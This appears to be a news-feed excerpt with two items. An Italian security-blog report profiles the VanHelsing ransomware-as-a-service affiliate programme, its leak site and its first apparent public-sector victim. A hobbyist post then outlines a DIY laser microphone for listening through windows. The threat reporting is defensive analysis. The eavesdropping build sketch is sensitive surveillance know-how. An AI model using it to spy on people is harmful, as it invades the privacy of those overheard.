L'articolo 8 Anni di Sfruttamento! Il Bug 0day su Microsoft Windows Che Ha Alimentato 11 Gruppi APT proviene da il blog della sicurezza informatica.
VanHelsing RaaS: Un Nuovo Modello di Ransomware-as-a-Service in Espansione
Il panorama delle minacce ransomware è in costante evoluzione, con gruppi sempre più strutturati che adottano strategie sofisticate per massimizzare il profitto. VanHelsing è un nuovo attore che si sta posizionando nel mercato del Ransomware-as-a-Service (RaaS), un modello che consente anche a cybercriminali con competenze limitate di condurre attacchi avanzati grazie a una piattaforma automatizzata.
Dopo l’annuncio del 23 febbraio 2025 sul forum underground riguardante il programma di affiliazione VanHelsing RaaS, il gruppo ransomware ha ufficialmente pubblicato la prima possbile vittima sul proprio Data Leak Site (DLS).
A meno di un mese dal lancio, la comparsa della prima organizzazione colpita conferma che il gruppo ha iniziato ad operare attivamente. Sebbene il DLS sia ancora scarno, il debutto di una vittima suggerisce che gli affiliati stiano già distribuendo il ransomware e che il numero di attacchi potrebbe aumentare rapidamente.
VanHelsing RaaS: Un Programma Strutturato per gli Affiliati
L’annuncio del 23 febbraio ha rivelato dettagli significativi sul funzionamento del programma VanHelsing RaaS, che si distingue per una strategia di reclutamento selettivo e strumenti avanzati.
Punti chiave del programma di affiliazione:
- Ingresso su invito: gli affiliati con una reputazione consolidata nel cybercrime possono aderire gratuitamente.
- Quota di ingresso per nuovi affiliati: chi non ha una reputazione pregressa deve pagare $5.000 per accedere alla piattaforma.
- Strumenti avanzati: accesso a un pannello web, un sistema di chat privato, un locker per chiavi di cifratura, strumenti di esfiltrazione dati e funzionalità di attacco ransomware automatizzate.
- Revenue sharing: gli affiliati trattengono l’80% del riscatto, mentre VanHelsing trattiene il 20%.
- Escrow su blockchain: i fondi vengono rilasciati dopo due conferme, riducendo i rischi di frode tra affiliati e sviluppatori.
- Crittografia avanzata: utilizzo di protocolli di cifratura di alto livello per rendere il ransomware resiliente alle contromisure.
- Automazione completa: il ransomware è interamente gestito tramite il pannello di controllo, eliminando errori operativi e riducendo la necessità di intervento manuale.
La Prima Possibile Vittima Pubblicata sul DLS
La prima possibile organizzazione colpita da VanHelsing RaaS opera nel settore pubblico, con funzioni amministrative Questo suggerisce che il gruppo potrebbe prendere di mira enti governativi, municipalità o servizi pubblici, categorie spesso vulnerabili a ransomware.
L’attacco sembra seguire una strategia di doppia estorsione, con un countdown di 10 giorni prima della pubblicazione dei dati esfiltrati. Questo lascia intendere che il gruppo stia negoziando un riscatto con l’ente colpito, cercando di massimizzare il profitto prima di rendere pubbliche eventuali informazioni sensibili.
Anatomia del DLS
Al momento, il DLS di VanHelsing contiene una sola possibile vittima, il che potrebbe indicare diverse possibilità:
- Il gruppo sta testando l’infrastruttura prima di pubblicare attacchi su larga scala.
- Ci sono altre vittime in fase di negoziazione, che non sono ancora state elencate nel DLS.
- Gli affiliati stanno ancora adottando il ransomware, e il numero di attacchi potrebbe aumentare esponenzialmente nelle prossime settimane.
L’esperienza con altri gruppi RaaS dimostra che il numero di vittime può crescere rapidamente man mano che nuovi cybercriminali iniziano ad utilizzare il servizio.
VanHelsing Chat: La Piattaforma di Comunicazione Privata
Un altro elemento distintivo di VanHelsing è la presenza di un portale di chat privato, accessibile solo tramite un Session ID. Questa piattaforma suggerisce che il gruppo gestisce direttamente le negoziazioni con le vittime e le comunicazioni con gli affiliati, senza affidarsi a strumenti pubblici come Telegram o forum underground.
L’adozione di una chat privata offre diversi vantaggi operativi:
- Maggiore sicurezza → Riduce il rischio di infiltrazioni da parte delle forze dell’ordine o di ricercatori di cybersecurity.
- Gestione diretta delle richieste di riscatto → Le vittime possono comunicare direttamente con il team di VanHelsing o con l’affiliato responsabile dell’attacco.
- Coordinamento degli affiliati → I membri del programma RaaS possono ricevere supporto tecnico e aggiornamenti operativi in tempo reale.
Questa infrastruttura è indicativa di un gruppo ransomware che punta a una gestione centralizzata e professionale degli attacchi, un elemento distintivo rispetto a operatori meno organizzati.
Conclusioni
L’emergere di VanHelsing RaaS rappresenta un’ulteriore evoluzione del modello ransomware, con un’infrastruttura altamente scalabile e strumenti avanzati per affiliati. La loro attenzione all’automazione e alla sicurezza operativa suggerisce che potremmo assistere a un aumento degli attacchi nei prossimi mesi, con impatti significativi su aziende e infrastrutture critiche.
L'articolo VanHelsing RaaS: Un Nuovo Modello di Ransomware-as-a-Service in Espansione proviene da il blog della sicurezza informatica.
Spy Tech: Build Your Own Laser Eavesdropper
Laser microphones have been around since the Cold War. Back in those days, they were a favorite tool of the KGB – allowing spies to listen in on what was being said in a room from a safe distance. This project by [SomethingAbtScience] resurrects that concept with a DIY build that any hacker worth their soldering iron can whip up on a modest budget. And let’s face it, few things are cooler than turning a distant window into a microphone.
At its core this hack shines a laser on a window, detects the reflected light, and picks up subtle vibrations caused by conversations inside the room. [SomethingAbtScience] uses an ordinary red laser (visible, because YouTube rules) and repurposes an amplifier circuit ripped from an old mic, swapping the capsule for a photodiode. The build is elegant in its simplicity, but what really makes it shine is the attention to detail: adding a polarizing filter to cut ambient noise and 3D printing a stabilized sensor mount. The output is still a bit noisy, but with some fine tuning – and perhaps a second sensor for differential analysis – there’s potential for crystal-clear audio reconstruction. Just don’t expect it to pass MI6 quality control.
While you probably won’t be spying on diplomats anytime soon, this project is a fascinating glimpse into a bygone era of physical surveillance. It’s also a reminder of how much can be accomplished with a laser pointer, some ingenuity, and the curiosity to see how far a signal can travel.
youtube.com/embed/EiVi8AjG4OY?…